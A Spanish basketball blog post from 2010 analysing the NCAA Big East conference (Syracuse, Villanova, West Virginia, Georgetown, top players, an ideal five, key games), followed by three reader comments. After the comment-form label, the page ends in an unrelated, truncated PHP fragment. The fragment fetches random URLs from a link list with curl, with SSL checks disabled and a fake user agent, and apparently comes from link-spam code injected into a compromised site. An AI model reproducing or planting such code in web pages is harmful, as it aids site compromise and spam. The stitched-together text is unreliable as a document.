Análisis NCAA – Big East

12 de February de 2010 por kantonyo

Antes de centrarnos en el All Stars, continuamos con el análisis de la NCAA a falta de un mes para el inicio del March Madness. En esta ocasión nos fijamos en la Conferencia Big-East, compuesta por 16 universidades, la mayoría situadas en el nordeste de EEUU.

Los Orange de Syracuse encabezan la Regular Season de la conferencia con 10 victorias y una sola derrota y se sitúan en el segundo puesto del ránking AP con un balance total de 23-1. Y todo esto a pesar de la importante baja de su base Jonny Flynn. Los de New York están siendo la gran revelación de toda la liga y una de las razones para este rendimiento se debe sobre todo a su nueva incorporación desde Iowa State, Wesley Johnson. Alero de 23 años, delgado, fibroso y con largos brazos, tiene un físico al estilo de Travis Outlaw y al igual que el jugador de Blazers, dispone de un buen lanzamiento de larga distancia y una capacidad de concentración que le permite promediar 8,8 rebotes por partido. Si fuera por sus cualidades debería estar entre los 10 primeros del próximo draft pero sus 23 años pueden ser una losa en este sentido. En el poste alto, los Orange disponen de Arinze Onuaku, un pívot de solo 2,03 que nos recuerda bastante a DeJuan Blair, defensivamente una mole pero con menos recursos ofensivos que el de San Antonio Spurs. Syracuse dispone de una plantilla muy compensada gracias a las nuevas incorporaciones y ha encontrado en Wesley Johnson su jugador referencia para optar al título de la BigEast.

Los grandes rivales de Syracuse para obtener el título de conferencia, son los Wildcats. La Universidad de Villanova, situada en la ciudad de Philadelphia, consiguió el año pasado llegar hasta la Final Four contra todo pronóstico. Este año han mantenido prácticamente la misma plantilla, y están mejorando los resultados, consiguiendo un espectacular balance de 21-2. La dupla de guards, Scottie Reynolds y Corey Fisher sigue siendo la referencia en el perímetro, dando un ritmo vertiginoso y electrizante al juego de los Wildcats. Por su parte, el ala-pívot neoyorquino de origen dominicano, Antonio Peña, ha ganado en protagonismo después de la baja de Dante Cunningham tras su marcha a la NBA. Aunque ningún jugador de esta universidad aparece en los mockdraft de los próximos años, los de Pensilvania se han puesto como meta mejorar los éxitos de la temporada pasada y por el momento son cuartos en el ranking organizado por la Associated Press.

Los Mountaineers de West Virginia han querido olvidar cuanto antes su fracaso en primera ronda del torneo final del año pasado, y han empezado la temporada a un gran nivel, situándose en el 5º puesto del ranking AP con un balance de 19-4. Dos de esas cuatro derrotas, fueron ante Syracuse y Villanova, rivales directos en la Big East. Su potencial se basa en el trío de forwards formado por DaSean Butler, Devin Ebanks y Kevin Jones. Los tres, de similares características, tienen amplias opciones de ser elegidos en el próximo draft. El punto débil de esta universidad radica en los puestos exteriores y en la ausencia de un pívot clásico.

Un poco más alejados en cuanto a aspiraciones, se encuentra la prestigiosa Universidad de Georgetown. Los Hoyas están siendo muy irregulares con grandes victorias sobre Duke o Villanova, pero con derrotas no esperadas ante equipos más débiles como Marquette o South Florida. A pesar de ello, tienen potencial para aspirar a todo. Su estrella Greg Monroe, es un claro reflejo de esa irregularidad. El ala-pívot de 19 años estaba considerado como el mejor de su promoción en sus años de instituto, pero el año pasado tuvo una actuación decepcionante llevando a los Hoyas fuera del torneo final. Este año ha demostrado una esperanzadora mejoría que puede llevarle a ser top 10 en el próximo draft. La mejora en las expectativas de Georgetown se debe sobre todo al progreso de sus jugadores exteriores, en especial Austin Freeman. El escolta de segundo año ha explotado sus cualidades esta temporada con grandes actuaciones, como los 33 puntos a UConn, 23 a Syracuse o los 25 a Villanova.

Individualmente, hay que destacar al ala-pívot de Notre Dame, Luke Haragondy. Con una media de casi 25 puntos por partido, está considerado uno de los mejores anotadores de la NCAA, después de la marcha de Stephen Curry a la NBA. Lleva cuatro temporadas en la universidad, y año tras año va mejorando sus números. Además es un gran reboteador con 10 rebotes por partido. En los Bulls de South Florida despunta el pequeño escolta de tercer año Dominique Jones, sobre todo después sus 46 puntos contra Providence o los 29 en la victoria contra Georgetown.

Quinteto Ideal

PF – Greg Monroe (Georgetown)
PF – Luke Harangody (Notre Dame)
SF – Wesley Johnson (Syracuse)
SG – Austin Freeman (Georgetown)
PG – Scottie Reynolds (Villanova)

Otros jugadores a seguir

– Centers: Samardo Samuels (Louisville), Arinze Onuaku (Syracuse)
– Forwards: DaSean Butler (West Virginia), Devin Ebanks (West Virginia), Kevin Jones (West Virginia), Lazar Hayward (Marquette), Stanley Robinson (UConn), Jamine Peterson (Providence)
– Guards: Kemba Walker (UConn), Jerome Dyson (UConn), Corey Fisher (Villanova), Mike Rosario (Rutgers), Dominique Jones (South Florida)

Próximos partidos clave

12 Febrero : West Virginia – Pittsburgh
14 Febrero : Louisville- Syracuse
18 Febrero : Syracuse – Georgetown
21 Febrero : Villanova – Pittsburgh

Comenta

3 comentarios a esta entrada

  1. NBA LAKERS BLOG dice:
    #1

    Tremendo analisis! Felicitaciones!

    ¡Te esperamos mañana en nuestro blog para la cobertura completa del All-Star Weekend!

    ¡Un fuerte abrazo!

    -NM-

      Citar

  2. Viva_Dirk dice:
    #2

    Kemba Walker tiene potencial aunque tanto el como Robinson tienen mas pinta de estrellas en Europa que de jugadores importantes en la NBA.

    Reynolds no me gusta nada y Monroe me decepcionó el año pasado, a ver como lo hacen en este.

      Citar

  3. Dantley2 dice:
    #3

    No había visto el anterior, enhorabuena por estos análisis con los que la verdad es que se queda completísimo el blog.

    Creo que Syracuse no tendrá rival. La verdad es que mirándolo desde el punto de vista de la NBA, no se ve ningún candidato a estrella, aunque Wesley Johnson lo está haciendo muy bien, pero creo que es más fruto de la madurez que de otra cosa. No lo he visto este año, pero el año pasado le vi dos partidos y aunque tampoco es que sea mucho, pero no me pareció tan bueno.

    Y Monroe coincido con Viva, huele a pufo, pero bueno, a ver qué sale, todavía tiene progresión

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>